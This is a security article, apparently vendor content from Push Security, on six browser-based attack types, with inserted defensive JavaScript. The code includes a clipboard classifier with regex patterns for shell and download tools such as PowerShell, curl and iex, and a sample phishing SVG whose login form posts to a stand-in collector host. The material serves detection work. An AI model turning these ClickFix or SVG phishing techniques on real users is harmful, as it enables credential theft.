© 2024 All Rights Reserved | Powered by Insighthub News
Six browser-based attack security teams need to prepare now

September 15, 2025 13 Min Read

In recent years, attacks targeting web browser users have increased at an unprecedented rate. In this article, we look at what "browser-based attacks" are and why they have proven so effective.

What is a browser-based attack?

First, it is important to establish what a browser-based attack is.

In most scenarios, attackers do not think of themselves as attacking a web browser. Their ultimate goal is to compromise business apps and data, and today that means going after the third-party services that are now the backbone of your business.

The most common attack path today is an attacker logging in to a third-party service, dumping its data and monetizing it through extortion. Just look at the Snowflake customer breaches last year, or the still-prominent Salesforce attacks, to see the impact.

The most logical way to do this is to target the users of those apps. In addition, changes in how people work have made users more reachable by external attackers than ever before, and have exposed them to a wider range of potential attack techniques.

Browser-based attacks such as AitM (adversary-in-the-middle) phishing, ClickFix and consent phishing have increased at an unprecedented rate in recent years.

Once upon a time, email was the main communication channel with the wider world, and work was done locally, on devices and within a locked-down network environment. That made email and endpoints the top priority from a security standpoint.

Now, modern work is carried out across a network of distributed internet apps, with far more diverse communication channels beyond email, which makes it difficult to stop users from interacting with malicious content (at least without significantly hindering their ability to do their job).

Given that the browser is where business apps are accessed and used, it makes sense that attacks increasingly unfold there.

Six critical browser-based attacks that your security team needs to know

1. Credential and session phishing

The most direct way for an attacker to compromise a business application is to phish the users of that app. You may not necessarily think of phishing as a browser-based attack, but that is exactly what we are seeing today.

Phishing tooling and infrastructure have evolved significantly over the past decade, but changes in how businesses work also mean there are more delivery vectors for phishing, and more apps and identities to aim at.

Attackers can deliver links via instant messenger apps, social media, SMS and malicious ads, use in-app messaging features, or bypass email-based checks by sending emails directly from legitimate SaaS services. Similarly, instead of a single app to target, there are hundreds, each with a different level of account security configuration.

Phishing is now multi-channel and cross-channel, targeting a vast range of cloud and SaaS apps using flexible AitM toolkits, but all roads inevitably lead to the browser.

Today, phishing operates on an industrial scale using a set of obfuscation and detection-evasion techniques. The latest generation of fully customized MFA-bypass phishing kits dynamically obfuscates the code that loads the page, implements custom bot protection (such as CAPTCHA and Cloudflare Turnstile), uses runtime anti-analysis capabilities, and uses legitimate SaaS and cloud services to host and serve phishing links, covering their tracks. Learn how modern phishing attacks bypass detection controls here.

These changes make phishing more effective than ever, and increasingly difficult to detect and block using email- and network-based anti-phishing tools.

2. Malicious copy and paste (aka ClickFix, FileFix, etc.)

One of the biggest security trends of the past year has been the emergence of the attack technique known as ClickFix.

Originally known as "fake CAPTCHAs", these attacks manipulate users into running malicious commands on their own devices, usually by having them solve some form of verification challenge in their browser.

In reality, by "solving" the challenge, the victim copies malicious code that the page has placed on the clipboard and runs it on the device. Typically, the victim is given instructions to copy, paste and run the command directly in a prompt dialog box, a terminal, or PowerShell. Variants such as FileFix have also appeared, which instead use the File Explorer address bar to execute OS commands, and recent examples show this branch of the attack forking to the Mac via the macOS Terminal.

Most commonly, these attacks are used to deliver infostealer malware, which then accesses business apps and services using the stolen session cookies and credentials.

As with modern credential and session phishing, links to the malicious pages are distributed across different delivery channels using a variety of lures, including impersonating CAPTCHA and Cloudflare Turnstile checks and simulating web page load errors. Many of the same protections used to obfuscate phishing pages and prevent their analysis also apply to ClickFix pages, which are equally difficult to detect and block.

Image: an example of a ClickFix lure used by attackers in the wild.
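One defensive angle on the copy-and-paste technique above is to inspect what a page actually places on the clipboard. The following is an added example, not code from the original article or from Push Security: a heuristic classifier for clipboard text plus the browser wiring that a content script would use. The regexes, thresholds and sample strings are constructed assumptions that would need tuning in a real deployment.

```javascript
// Added example: classify text a web page writes to the clipboard, as the core
// of a content script that watches for ClickFix-style lures. Patterns and
// samples are constructed for illustration, not a production rule set.

const INTERPRETER = /\b(powershell(\.exe)?|pwsh|cmd(\.exe)?|mshta|wscript|cscript|bash|zsh|sh|osascript)\b/i;
const FETCH_OR_EVAL = /\b(iwr|invoke-webrequest|invoke-expression|iex|curl|wget|downloadstring|start-process)\b/i;
const ENCODED = /(-enc(odedcommand)?\b|frombase64string|base64\s+(-d|--decode))/i;
const STEALTH = /(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|\/c\s|2>\s*\/dev\/null)/i;
const RUN_HINT = /(win\s*\+\s*r|run dialog|press (enter|return))/i;

function classifyClipboardText(text) {
  const reasons = [];
  if (INTERPRETER.test(text)) reasons.push('invokes a shell or script host');
  if (FETCH_OR_EVAL.test(text)) reasons.push('fetches and/or evaluates remote content');
  if (ENCODED.test(text)) reasons.push('uses encoded or base64 arguments');
  if (STEALTH.test(text)) reasons.push('hides its console window or output');
  if (RUN_HINT.test(text)) reasons.push('tells the user where to paste it');
  // A shell name alone is common in legitimate documentation, so require a
  // second signal before calling the clipboard content suspicious.
  return { verdict: reasons.length >= 2 ? 'suspicious' : 'benign', reasons };
}

// Browser wiring for a content script. Returns false when there is no DOM so
// the classifier can also be exercised under Node. Note: to observe the page's
// own navigator.clipboard calls the script must run in the page's main world
// (Manifest V3 content_scripts "world": "MAIN"), not the isolated world.
function installClipboardWatcher(report = console.warn) {
  if (typeof document === 'undefined') return false;
  const check = (text) => {
    const r = classifyClipboardText(String(text));
    if (r.verdict === 'suspicious') report({ url: location.href, ...r });
  };
  // Path 1: the page handles the 'copy' event and calls clipboardData.setData().
  // A bubble-phase listener on document runs after the page's own handler.
  document.addEventListener('copy', (ev) => {
    const data = ev.clipboardData && ev.clipboardData.getData('text/plain');
    if (data) check(data);
  });
  // Path 2: the page calls navigator.clipboard.writeText() directly.
  if (navigator.clipboard && navigator.clipboard.writeText) {
    const original = navigator.clipboard.writeText.bind(navigator.clipboard);
    navigator.clipboard.writeText = (text) => { check(text); return original(text); };
  }
  return true;
}
```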

3. Malicious OAuth integrations

Malicious OAuth integration is another way for attackers to compromise apps: tricking users into authorizing an integration between the app and a malicious, attacker-controlled app. This is also known as consent phishing.

Image: an example of consent phishing. The attacker tricks the victim into authorizing an attacker-controlled app with risky permissions.

This is an effective way for attackers to bypass hardened authentication and access controls on the account, because the typical login process is avoided entirely. That includes phishing-resistant MFA methods such as passkeys, since the standard login flow never takes place.


This variant of the attack has recently dominated headlines in the ongoing Salesforce breaches. In this scenario, the attacker tricks the victim into approving an attacker-controlled OAuth app via Salesforce's device code authentication flow, which requires the user to enter an 8-digit code rather than a password or MFA factor.

Image: the ongoing Salesforce attacks give a malicious OAuth app access to the victim's Salesforce tenant.

Preventing malicious OAuth grants requires close, in-app management of user permissions and tenant security settings. That is no small feat given the hundreds of apps used across a modern enterprise, many of which are not centrally managed by IT and security teams (and some of which are entirely unknown to them). Even then, you are limited by the controls each app vendor makes available.

In this case, Salesforce has announced planned changes to how OAuth apps are approved, to improve security in response to these attacks, but there are many more apps with weak configurations for attackers to use in the future.

4. Malicious browser extensions

Malicious browser extensions are another way for attackers to compromise business apps, by extracting session cookies and credentials stored in the browser cache and password manager, or by observing and capturing logins as they occur.

An attacker does this either by creating their own malicious extension and getting users to install it, or by taking over an existing extension that is already installed in users' browsers. It is surprisingly easy for an attacker to buy an existing extension, push a malicious update to it, and pass the extension store's security checks.

News of extension-based compromises has increased since the Cyberhaven extension was hijacked in December 2024, along with at least 35 other extensions. Since then, millions of malicious extensions have been identified, with millions of installations.

In theory, employees should not install browser extensions at random unless the security team has approved them in advance. In reality, many organizations have little visibility into the extensions their employees use, and are potentially exposed as a result.

5. Malicious file delivery

Malicious files have been a central part of malware delivery and credential theft for many years. Just as non-email channels such as malvertising and drive-by attacks are now used to deliver phishing and ClickFix lures, malicious files are distributed through the same means. That leaves malicious file detection to basic known-bad checks, sandbox analysis via a proxy (not that useful against sandbox-aware malware), or runtime analysis on the endpoint.

This does not have to be a malicious executable that drops malware directly onto the device. Downloaded files can also contain further links that take users to malicious content. In fact, one of the most common types of downloaded content is the HTML Application (HTA), commonly used to spawn local phishing pages and stealthily capture credentials. More recently, attackers have weaponized SVG files for the same purpose, running them as self-contained phishing pages that render the fake login portal entirely client-side.


Even when malicious content cannot be flagged by surface-level inspection of the file, recording file downloads in the browser is a useful addition to endpoint-based malware protection, providing another layer of defense against downloads that either perform client-side attacks or redirect users to malicious web content.
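To make the "inspect downloads in the browser" idea concrete for the HTA and SVG cases described above, here is an added example that is not code from the original article or from Push Security. It assumes a download hook that can hand over a filename and the file's text; the rule list and both sample SVGs are constructed for illustration.

```javascript
// Added example: inspect a browser download for the client-side phishing
// patterns discussed in the text. HTA files are blocked outright; SVG files are
// scanned for script or HTML-form capabilities. Rules and samples are constructed.

const SVG_RULES = [
  { id: 'script',        re: /<script\b/i,                            why: '<script> executes when the SVG is opened in a browser tab' },
  { id: 'eventHandler',  re: /\son(load|click|error|begin|end)\s*=/i,  why: 'inline event-handler attribute' },
  { id: 'jsUri',         re: /(href|src)\s*=\s*["']?\s*javascript:/i,  why: 'javascript: URI' },
  { id: 'foreignObject', re: /<foreignObject\b/i,                      why: '<foreignObject> can host arbitrary HTML such as a login form' },
  { id: 'passwordInput', re: /<input\b[^>]*type\s*=\s*["']?password/i, why: 'password field inside an image file' },
  { id: 'base64Blob',    re: /[A-Za-z0-9+/]{200,}={0,2}/,              why: 'large base64 blob, often an encoded second stage' },
];
// Any scripting capability is decisive; a form or blob alone is held for review.
const DECISIVE = new Set(['script', 'eventHandler', 'jsUri']);

function inspectSvg(svgText) {
  const findings = SVG_RULES.filter(r => r.re.test(svgText)).map(({ id, why }) => ({ id, why }));
  const severity = findings.some(f => DECISIVE.has(f.id)) ? 'block'
                 : findings.length ? 'review' : 'allow';
  return { severity, findings };
}

// Entry point for a download hook: the filename plus the file's text content.
function inspectDownload(filename, text) {
  const name = filename.toLowerCase();
  if (name.endsWith('.hta')) {
    return { severity: 'block', findings: [{ id: 'hta', why: 'HTML Application runs outside the browser sandbox as a trusted local app' }] };
  }
  if (name.endsWith('.svg')) return inspectSvg(text);
  return { severity: 'allow', findings: [] };
}

// Constructed sample: an SVG that renders a login form and carries a script.
const SAMPLE_PHISHING_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
  <foreignObject width="100%" height="100%">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://collector.example.invalid/login">
      <input type="email" name="u"/><input type="password" name="p"/>
    </form>
  </foreignObject>
  <script>/* placeholder: a real lure would submit the form */</script>
</svg>`;
// Constructed sample: an ordinary icon with no active content.
const SAMPLE_BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="red"/></svg>';
```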

6. Stolen credentials and MFA gaps

This last one is not so much an attack in itself as the product of the others. Credentials stolen through phishing or infostealer malware can be used to take over any account where MFA is missing.

It is not the most sophisticated attack, but it is very effective. Look at the Snowflake account compromises last year, or the Jira attacks earlier this year, to see attackers making use of stolen credentials at scale.

In a modern enterprise with hundreds of apps, it is very likely that some app is not configured to require MFA (where that is even possible). And even when an app is configured for SSO and connected to the main corporate identity, a local "ghost login" can still exist that accepts a password without any MFA.

Logins can also be observed in the browser. In fact, the browser is the closest thing to a universal source of truth about how employees actually log in, which apps they use and whether MFA is present, so that security teams can find and fix these gaps before attackers exploit them.
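The following added example (not code from the original article or from Push Security) shows how browser-observed login events could be turned into the three findings this section names: ghost logins, MFA gaps and SSO coverage gaps. The event shape and the sample data are constructed assumptions.

```javascript
// Added example: classify browser-observed login events to surface MFA gaps,
// ghost logins and SSO coverage gaps. Event shape and sample data are constructed.

// Each event records which app, which identity, how the login happened
// ('sso' = delegated to the corporate IdP) and whether an MFA factor was seen.
const SAMPLE_LOGINS = [
  { app: 'crm.example.invalid',  user: 'a@corp', method: 'sso',      mfa: true  },
  { app: 'crm.example.invalid',  user: 'b@corp', method: 'password', mfa: false },
  { app: 'wiki.example.invalid', user: 'a@corp', method: 'password', mfa: false },
  { app: 'wiki.example.invalid', user: 'c@corp', method: 'password', mfa: true  },
  { app: 'data.example.invalid', user: 'b@corp', method: 'password', mfa: true  },
];

function findIdentityGaps(events) {
  // Group events per app so SSO usage and password usage can be compared.
  const byApp = new Map();
  for (const e of events) {
    if (!byApp.has(e.app)) byApp.set(e.app, []);
    byApp.get(e.app).push(e);
  }
  const findings = [];
  for (const [app, logins] of byApp) {
    const ssoSeen = logins.some(l => l.method === 'sso');
    for (const l of logins.filter(l => l.method === 'password')) {
      // Ghost login: the app is behind SSO, yet a local password still works.
      if (ssoSeen) findings.push({ app, user: l.user, type: 'ghost-login' });
      // MFA gap: a password login that no MFA challenge followed.
      if (!l.mfa) findings.push({ app, user: l.user, type: 'mfa-gap' });
    }
    // SSO coverage gap: nobody has ever reached this app through the IdP.
    if (!ssoSeen) findings.push({ app, type: 'sso-coverage-gap' });
  }
  return findings;
}
```

Feeding the constructed sample through reports b@corp's password login to the CRM as a ghost login, two MFA gaps, and two apps with no SSO coverage.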

Conclusion

Attacks are increasingly taking place in the browser. That makes the browser the ideal place to detect and respond to them, yet for most security teams it remains a blind spot.

Push Security's browser-based security platform provides comprehensive detection and response capabilities for the leading causes of breaches. It blocks browser-based attacks such as AitM phishing, credential stuffing, password spraying and session hijacking with stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps your employees use, such as ghost logins, SSO coverage gaps, MFA gaps, weak passwords and risky OAuth integrations.

If you would like to learn more about how Push can help you detect and stop attacks in the browser, check out our latest product overview or book a live demo with one of our team.
